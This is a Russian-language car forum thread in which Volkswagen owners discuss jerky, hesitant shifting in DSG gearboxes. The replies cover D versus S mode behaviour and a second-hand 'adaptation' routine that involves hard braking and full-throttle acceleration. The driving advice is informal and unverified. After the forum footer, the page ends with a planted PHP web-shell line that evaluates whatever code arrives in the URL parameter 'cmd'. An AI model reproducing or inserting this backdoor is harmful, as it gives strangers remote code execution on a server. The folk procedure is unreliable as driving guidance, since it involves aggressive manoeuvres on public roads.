+ Ответить в теме
Показано с 1 по 7 из 7

Тема: Странная Работа Dsg


Комбинированный просмотр

  1. #1
    Мимо проходил GFF-402 is on a distinguished road Аватар для GFF-402
    Регистрация
    13.11.2007
    Сообщений
    2
    Проехал 3000 км.Стал замечать странную работу DSG.При разгоне со второй передачи после торможения
    на небольшом газу коробка начинает быстро переключать передачи,при этом переключения сопровождаются рывками.Хотелось бы узнать это у всех или только у меня?

  2. #2
    Не поняяятноо написал...Но я думаю,что те еще побольше нада покататься...
    меня ДСГ работает отлично,великое изобретение))))

  3. #3
    Если ты имеешь ввиду не то чтобы рывки а затупления небольшие, то я тоже заметил такую фигню.... встретил одного товарища тоже на ДСГ, он подошел и про это же спросил, сдесь была уже такая тема где-то..... Когда начинаешь плавно стартовать а потом чуть больше газа даешь, примерно на 1\3 то машинка как бы клюет слегка.... Я так понял что это из-за того что коробка думает что ты не собираешься топить и переключает передачи на маленьких оборотах а когда ты уже прижал газ, то до ДСГ еще не допирает что ты собрался нормально притопить и она также переключает на маленьких оборотах... Кароче походу я коряво написал... но я понял о чем идет речь... надо просто приточится ездить на ДСГ и таких тем не будет....

  4. #4
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    <div class='quotetop'>Цитата(paketapak &#064; May 27 2008, 12&#58;34) <{POST_SNAPBACK}></div><div class='quotemain'>Если ты имеешь ввиду не то чтобы рывки а затупления небольшие, то я тоже заметил такую фигню.... встретил одного товарища тоже на ДСГ, он подошел и про это же спросил, сдесь была уже такая тема где-то..... Когда начинаешь плавно стартовать а потом чуть больше газа даешь, примерно на 1&#092;3 то машинка как бы клюет слегка.... Я так понял что это из-за того что коробка думает что ты не собираешься топить и переключает передачи на маленьких оборотах а когда ты уже прижал газ, то до ДСГ еще не допирает что ты собрался нормально притопить и она также переключает на маленьких оборотах... Кароче походу я коряво написал... но я понял о чем идет речь... надо просто приточится ездить на ДСГ и таких тем не будет....[/b][/quote]

    Просто включайте режим S и никто тупить не будет (если дорога сухая и покрытие однородное), но учиться ездить нужно будет заново
    Режим D - грубо говоря работает и на наших и на ваших - он старается и бензин сэкономить и поехать когда нужно. При включении режима S меняется не только программа коробки но и реакция на педаль газа. Если в режиме D жать на педаль плавно, то машинка будет стараться максимально экономить бензин, и ехать будет неспеша. Если активно топтать тапку, то начнет откликаться активнее - чем активнее топчешь, тем более ясная реакция. Но вот переход от плавного перемещения к резкому (именно в режиме D) будет через легкий тупичок. В режиме S машинка всерьез решает что она на треке и ведет себя соответствующе - переключается быстро и достаточно жестко, движок крутит по полной, вниз переключается с перегазовками
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  5. #5
    МАХ, только хотел написать тоже самое...

  6. #6
    Мимо проходил GFF-402 is on a distinguished road Аватар для GFF-402
    Регистрация
    13.11.2007
    Сообщений
    2
    Сегодня звонил товарищу.Он работает в техцентре Ауди.У них тоже были вопросы по DSG.Он мне рекомендовал провести адаптацию коробки на ходу.Правда это делается после сброса всех адаптаций коробки на ноль с помощью диагностического компьютера ,но можно попробавать и без них. Процедура такая.В режиме Tiptronic доходим до 3 или 5 передачи и двигаемся на выбранной передаче около 5 минут в деапазоне 1200-3500 об/мин потом выбираем 4 или 6 передачи и также двигаемся с оборотами 1200-3500 об/мин.После чего производим резкое торможение до 2 передачи и сразу резкий разгон в пол пока не дойдем до 6 передачи.Должно помочь.А также по правде он сказал, что адаптация коробки проходит во время движения после каждого запуска двигателя и если ей сразу показать кто в доме хозяин ,то и тупить она не будет.

  7. #7
    Да,только с начала машину нада прогреть,а то сразу на холодную..тапку в пол,это не гуд&#33;

+ Ответить в теме

Похожие темы

  1. Выгодная работа
    от Naduxa в разделе Курилка
    Ответов: 29
    Последнее сообщение: 02.10.2021, 10:23
  2. Странная мелкая вибрация на низких оборотах при трогании
    от daToxa в разделе Ремонт и обслуживание
    Ответов: 6
    Последнее сообщение: 30.04.2010, 12:29
  3. Работа DSG
    от constantinus в разделе Украина
    Ответов: 3
    Последнее сообщение: 21.12.2007, 15:17
  4. Странная комплектация
    от PhillFiX в разделе Курилка
    Ответов: 11
    Последнее сообщение: 02.10.2006, 18:46
  5. работа
    от S@TURN в разделе Курилка
    Ответов: 7
    Последнее сообщение: 18.09.2006, 10:17

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}